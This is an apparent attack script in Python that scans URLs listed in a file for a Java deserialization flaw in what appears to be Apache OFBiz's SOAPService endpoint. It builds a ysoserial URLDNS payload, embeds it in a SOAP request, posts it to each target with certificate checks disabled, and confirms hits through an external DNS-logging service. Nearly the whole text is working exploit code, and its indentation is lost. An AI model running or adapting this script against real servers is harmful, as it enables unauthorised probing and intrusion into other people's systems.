#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
urllib3.disable_warnings()
def main():
id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0]
if(not os.path.exists("target.txt")):
exit("put url in target.txt! ")
if(not os.path.exists("ysoserial.jar")):
exit("where is ysoserial.jar?")
with open("target.txt")as f:
urls = f.readlines()
for url in urls:
url = url.strip()
uid = uuid.uuid1().hex
cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id)
r = os.popen(cmd)
r.close()
with open("tmp",'rb') as f:
payload = binascii.hexlify(f.read())
data = '''
<soapenv:envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:header>
<soapenv:body>
<ser>
<map-hashmap>
<map-entry>
<map-key>
<cus-obj>{0}</cus-obj>
</map-key>
<map-value>
<std-string value="http://baidu.com">
</std-string></map-value>
</map-entry>
</map-hashmap>
</ser>
</soapenv:body>
</soapenv:header></soapenv:envelope>
'''.format(payload.decode())
headers = {
"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
}
url = url+"/webtools/control/SOAPService"
try:
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
except:
pass
dnslogresurl = "https://dns.xn--9tr.com/"+id
if(uid in requests.get(dnslogresurl).text):
print("[+] {0} Vulnerability exists".format(url))
else:
print("[-] {0} Vulnerability does not exist".format(url))
print("[+] Please come {0} View Results".format(dnslogresurl))
if __name__ == "__main__":
main()
Join the conversation